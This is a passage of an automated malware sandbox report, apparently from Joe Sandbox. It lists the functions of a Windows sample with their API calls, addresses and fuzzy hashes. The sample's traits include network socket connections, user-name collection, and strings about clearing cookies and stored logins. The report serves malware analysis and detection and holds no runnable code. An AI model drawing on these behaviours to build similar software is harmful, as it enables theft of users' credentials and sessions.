                                                • Opcode Fuzzy Hash: 27e8c6a9e77f87a7722667680bfd72997ab372b83382414f82f6f9086f836895
                                                • Instruction Fuzzy Hash: 75F0977590020EABCB04EFA4D95D9EE7B38AF44306B008064F916A71A1DA74AB09CB69
                                                Function 0040D189 Relevance: 9.1, APIs: 6, Instructions: 70COMMON
                                                Download Yara Rule
                                                APIs
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000002), ref: 0040D195
                                                • atoi.MSVCRT(00000000), ref: 0040D19C
                                                  • Part of subcall function 00411254: GetCurrentProcess.KERNEL32(?,00000000,00000001,00000002), ref: 00411267
                                                  • Part of subcall function 00411254: GetCurrentThread.KERNEL32 ref: 0041126A
                                                  • Part of subcall function 00411254: GetCurrentProcess.KERNEL32(00000000), ref: 00411271
                                                  • Part of subcall function 00411254: DuplicateHandle.KERNEL32(00000000), ref: 00411274
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 0040D1D4
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 0040D1EA
                                                  • Part of subcall function 004113E6: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00419970,00419BC8,00000000,00408808,)A,00000000,0000000B), ref: 004113F2
                                                  • Part of subcall function 004113E6: ??2@YAPAXI@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 00411400
                                                  • Part of subcall function 004113E6: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 00411422
                                                  • Part of subcall function 004113E6: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E), ref: 00411444
                                                  • Part of subcall function 004113E6: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 00411458
                                                  • Part of subcall function 004113E6: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 00411461
                                                  • Part of subcall function 00403AC1: __EH_prolog.LIBCMT ref: 00403AC6
                                                  • Part of subcall function 00403AC1: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 00403AE3
                                                  • Part of subcall function 00403AC1: socket.WS2_32(00000000,00000001,00000006), ref: 00403AF6
                                                  • Part of subcall function 00403AC1: connect.WS2_32(00000000,00419298,00000010), ref: 00403B05
                                                  • Part of subcall function 00403AC1: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,?,00419288,?,00000006), ref: 00403B2E
                                                  • Part of subcall function 00403AC1: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,00000006), ref: 00403B38
                                                  • Part of subcall function 00403AC1: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,00000006), ref: 00403B5E
                                                  • Part of subcall function 00403AC1: _CxxThrowException.MSVCRT(00000001,00414F18), ref: 00403B7E
                                                  • Part of subcall function 00403AC1: ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,00000006), ref: 00403B8C
                                                  • Part of subcall function 00403AC1: ?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000006), ref: 00403B96
                                                  • Part of subcall function 00403AC1: ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000006), ref: 00403BA0
                                                  • Part of subcall function 00403AC1: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,?,00413894,?), ref: 00403BC6
                                                  • Part of subcall function 00403AC1: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?), ref: 00403BD0
                                                  • Part of subcall function 00403AC1: FindFirstFileW.KERNEL32(00000000,?,?,?), ref: 00403BD7
                                                  • Part of subcall function 00403AC1: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?), ref: 00403BE6
                                                  • Part of subcall function 00403AC1: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00413670,?), ref: 00403C05
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000000), ref: 0040E4F8
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,00000000), ref: 0040E501
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$G@std@@$G@2@@std@@$??0?$basic_string@$??1?$basic_string@$?c_str@?$basic_string@CurrentHstd@@V01@@V?$basic_string@$?begin@?$basic_string@D@1@@D@2@@0@ProcessV10@0@$??2@?end@?$basic_string@?length@?$basic_string@DuplicateExceptionFileFindFirstG@1@@G@2@@0@H_prologHandleThreadThrowV10@atoiconnectsocket
                                                • String ID:
                                                • API String ID: 515995264-0
                                                • Opcode ID: 0c917455502c1229e80014b51a23b24372c10e94e1266ee6e90931165b098142
                                                • Instruction ID: e0e445b4bfbbbc415ef5c81fe9f50e5d85b25a9855f7445ad3f9011a8f58073a
                                                • Opcode Fuzzy Hash: 0c917455502c1229e80014b51a23b24372c10e94e1266ee6e90931165b098142
                                                • Instruction Fuzzy Hash: 06214F72A111059BDB08FBB2DC5A9FE7738EB50315F00487EF512E60E2EE385A44CB99
                                                Function 004048A0 Relevance: 9.1, APIs: 6, Instructions: 59sleepfileCOMMON
                                                Download Yara Rule
                                                APIs
                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(80000000,00000007,00000000,00000003,00000080,00000000,00413670,?,00419BC8,00404982), ref: 004048D0
                                                • CreateFileW.KERNEL32(00000000), ref: 004048D7
                                                • GetFileSize.KERNEL32(00000000,00000000), ref: 004048E6
                                                • Sleep.KERNEL32(00002710), ref: 00404915
                                                • CloseHandle.KERNEL32(00000000), ref: 0040491C
                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00404944
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: FileG@2@@std@@G@std@@U?$char_traits@V?$allocator@$??0?$basic_string@?c_str@?$basic_string@CloseCreateHandleSizeSleepV01@@
                                                • String ID:
                                                • API String ID: 3524115370-0
                                                • Opcode ID: 986ffed7f88aaac2b89297939494aa5c86be602e820aeb2fc323dd33349d82f8
                                                • Instruction ID: 6ec8d3a28f83b8578ae07b74a486faa57b0e20ac043ef5b33e925dc285618abe
                                                • Opcode Fuzzy Hash: 986ffed7f88aaac2b89297939494aa5c86be602e820aeb2fc323dd33349d82f8
                                                • Instruction Fuzzy Hash: C7112BF16002407FEB217734A999BAB7FD8AB82715F04843EE68262AD0C778AD44871D
                                                Function 004113E6 Relevance: 9.1, APIs: 6, Instructions: 57COMMON
                                                Download Yara Rule
                                                APIs
                                                • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00419970,00419BC8,00000000,00408808,)A,00000000,0000000B), ref: 004113F2
                                                • ??2@YAPAXI@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 00411400
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 00411422
                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E), ref: 00411444
                                                  • Part of subcall function 004127A4: free.MSVCRT ref: 004127A8
                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 00411458
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 00411461
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: V?$allocator@$U?$char_traits@$G@2@@std@@G@std@@$??0?$basic_string@D@2@@std@@D@std@@$??1?$basic_string@??2@?c_str@?$basic_string@?length@?$basic_string@G@1@@V01@@free
                                                • String ID:
                                                • API String ID: 1231779380-0
                                                • Opcode ID: 9532b84cd3d6fdac275936aa522e7c36b8ebc098c247d6622e756b8edd5b5c78
                                                • Instruction ID: 565288d66402da44d80f35b121c758f15f89b2f18a26fc00004be9e921349c24
                                                • Opcode Fuzzy Hash: 9532b84cd3d6fdac275936aa522e7c36b8ebc098c247d6622e756b8edd5b5c78
                                                • Instruction Fuzzy Hash: 4E01843620011CAB8B08EF68EC958EFB7EAFB88215744443DF917C7290DE309A45CB54
                                                Function 00411980 Relevance: 9.0, APIs: 6, Instructions: 48fileCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000,80000001,00419970,?,00409E13,?,?), ref: 0041199A
                                                • GetFileSize.KERNEL32(00000000,00000000,00000000,?,00409E13,?,?), ref: 004119AE
                                                • ?resize@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXID@Z.MSVCP60(00000000,00000000,?,00409E13,?,?), ref: 004119BB
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,00000000,?,00409E13,?,?), ref: 004119CD
                                                • ReadFile.KERNEL32(00000000,00000000,?,00409E13,?,?), ref: 004119D5
                                                • CloseHandle.KERNEL32(00000000,00409E13,?,?), ref: 004119E3
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: File$D@2@@std@@D@std@@U?$char_traits@V?$allocator@$?c_str@?$basic_string@?resize@?$basic_string@CloseCreateHandleReadSize
                                                • String ID:
                                                • API String ID: 2061410294-0
                                                • Opcode ID: cfe8e39061eed12f12d7ea76829419e22fc1dcedfda31822001064d912202d0b
                                                • Instruction ID: c1641b8cee803a48650529896c1567fc698ce0bfe9ddfeea6561ea23c804a408
                                                • Opcode Fuzzy Hash: cfe8e39061eed12f12d7ea76829419e22fc1dcedfda31822001064d912202d0b
                                                • Instruction Fuzzy Hash: 1CF0A471201118BFEB115F60ECD9EFBBB2CEB467A6F108226FD15962A0C6355E41C668
                                                Function 0040E0C9 Relevance: 9.0, APIs: 6, Instructions: 41windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000002), ref: 0040E0D5
                                                • atoi.MSVCRT(00000000), ref: 0040E0DC
                                                  • Part of subcall function 004113E6: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00419970,00419BC8,00000000,00408808,)A,00000000,0000000B), ref: 004113F2
                                                  • Part of subcall function 004113E6: ??2@YAPAXI@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 00411400
                                                  • Part of subcall function 004113E6: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 00411422
                                                  • Part of subcall function 004113E6: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E), ref: 00411444
                                                  • Part of subcall function 004113E6: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 00411458
                                                  • Part of subcall function 004113E6: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 00411461
                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000001,-00010000), ref: 0040E104
                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,00000000), ref: 0040E127
                                                • MessageBoxW.USER32(00000000,00000000), ref: 0040E12F
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040E13B
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: V?$allocator@$U?$char_traits@$G@2@@std@@G@std@@$?c_str@?$basic_string@$D@2@@std@@D@std@@$??0?$basic_string@??1?$basic_string@$??2@?length@?$basic_string@G@1@@MessageV01@@atoi
                                                • String ID:
                                                • API String ID: 1425508405-0
                                                • Opcode ID: 8e496c5c9f50ef922a7d9044c1d0f558d047650de926fc42336fbcde88a65c2d
                                                • Instruction ID: c0a38703f659e5a0c2706da8275acbd9ade6fdec43d2dd9129fd9c4cf88114e1
                                                • Opcode Fuzzy Hash: 8e496c5c9f50ef922a7d9044c1d0f558d047650de926fc42336fbcde88a65c2d
                                                • Instruction Fuzzy Hash: B101F4719051159FDF14ABA0DC59AFE776CEB04306F0044AAF502E20E0DE385A848E18
                                                Function 00410DFA Relevance: 9.0, APIs: 6, Instructions: 41COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetUserNameW.ADVAPI32(?,?), ref: 00410E2C
                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00414BD0,?,?), ref: 00410E45
                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,?,00000000), ref: 00410E54
                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(00000010,00000000), ref: 00410E60
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00410E6B
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00410E74
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: V?$allocator@$G@std@@U?$char_traits@$G@2@@std@@$??1?$basic_string@G@2@@0@Hstd@@V?$basic_string@$??0?$basic_string@G@1@@NameUserV10@V10@@
                                                • String ID:
                                                • API String ID: 3382107156-0
                                                • Opcode ID: 62dcdea65f463dbe7c30639eb1b0934039d72c6ac1d9fdd29727a672d8aa6cdd
                                                • Instruction ID: 5692310f77cd5f2a2bfc5674261ee475784c176fd1b0b7ffc65508031a147662
                                                • Opcode Fuzzy Hash: 62dcdea65f463dbe7c30639eb1b0934039d72c6ac1d9fdd29727a672d8aa6cdd
                                                • Instruction Fuzzy Hash: 0E018CB1C0010DAFDB01EF94EC49EDEBB7CEB18309F1081A6E515E2150EB74A7598BA4
                                                Function 0040D259 Relevance: 9.0, APIs: 6, Instructions: 40COMMON
                                                Download Yara Rule
                                                APIs
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040D265
                                                • StrToIntA.SHLWAPI(00000000), ref: 0040D26C
                                                  • Part of subcall function 004113E6: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00419970,00419BC8,00000000,00408808,)A,00000000,0000000B), ref: 004113F2
                                                  • Part of subcall function 004113E6: ??2@YAPAXI@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 00411400
                                                  • Part of subcall function 004113E6: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 00411422
                                                  • Part of subcall function 004113E6: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E), ref: 00411444
                                                  • Part of subcall function 004113E6: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 00411458
                                                  • Part of subcall function 004113E6: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 00411461
                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000001), ref: 0040D28F
                                                  • Part of subcall function 00411F9F: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00413984,?,00000001), ref: 00411FDC
                                                  • Part of subcall function 00411F9F: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00413984,?), ref: 00412103
                                                  • Part of subcall function 00411F9F: SystemParametersInfoW.USER32(00000014,00000000,?,00000003), ref: 00412121
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,0041498C), ref: 0040D54E
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000000), ref: 0040E4F8
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,00000000), ref: 0040E501
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: V?$allocator@$U?$char_traits@$D@2@@std@@D@std@@$G@2@@std@@G@std@@$??0?$basic_string@??1?$basic_string@$?c_str@?$basic_string@$D@1@@$??2@?length@?$basic_string@G@1@@InfoParametersSystemV01@@
                                                • String ID:
                                                • API String ID: 1485308852-0
                                                • Opcode ID: 13a76f7988c4364f187031a2d8dd5249b71c4b3df36451a571f2779d6b219720
                                                • Instruction ID: fe25fe19379bf1abe6192e87728e4350864f898ca73e16e85829aa7fae53df9a
                                                • Opcode Fuzzy Hash: 13a76f7988c4364f187031a2d8dd5249b71c4b3df36451a571f2779d6b219720
                                                • Instruction Fuzzy Hash: ADF0FB729041189BCB09BBB1EC5AAED7768AB54316F1044BEE502E20E0EF389A44CB59
                                                Function 00406CF8 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 83sleepCOMMON
                                                Download Yara Rule
                                                APIs
                                                • Sleep.KERNEL32 ref: 00406D12
                                                • Sleep.KERNEL32(00001388), ref: 00406D84
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([Cleared all cookies & stored logins!],?), ref: 00406DAE
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00413E88,00000001), ref: 00406DD2
                                                  • Part of subcall function 00406B78: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,75920F00,00000000), ref: 00406B8A
                                                  • Part of subcall function 00406B78: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00406BB5
                                                  • Part of subcall function 00406B78: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00406BBE
                                                  • Part of subcall function 00406B78: ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,00413670), ref: 00406BCD
                                                  • Part of subcall function 00406B78: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([IE cookies not found],?), ref: 00406BE8
                                                  • Part of subcall function 00406B78: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00406CEC
                                                Strings
                                                • [Cleared all cookies & stored logins!], xrefs: 00406DA9
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??0?$basic_string@D@1@@$??1?$basic_string@Sleep$??4?$basic_string@??8std@@?c_str@?$basic_string@D@2@@0@V01@V01@@V?$basic_string@
                                                • String ID: [Cleared all cookies & stored logins!]
                                                • API String ID: 3797260644-1894301085
                                                • Opcode ID: f02599ac0d7fdbb476ca82299fc5cb0a15f45f0c410d136db98a7da5d5e5f8ed
                                                • Instruction ID: 0a00056757255ab95dba908c6600c2e5334c93db793d55d6a0d527bdd2eda3b0
                                                • Opcode Fuzzy Hash: f02599ac0d7fdbb476ca82299fc5cb0a15f45f0c410d136db98a7da5d5e5f8ed
                                                • Instruction Fuzzy Hash: 9C31F451E9A2C87DEF22E7F515229DEBE744E12204B0AC4FFD48137286D47A0A58D35B
                                                Function 0040A972 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 57registryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0040A99A
                                                • malloc.MSVCRT ref: 0040A9A8
                                                • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0040A9D7
                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00413670,?), ref: 0040A9E1
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
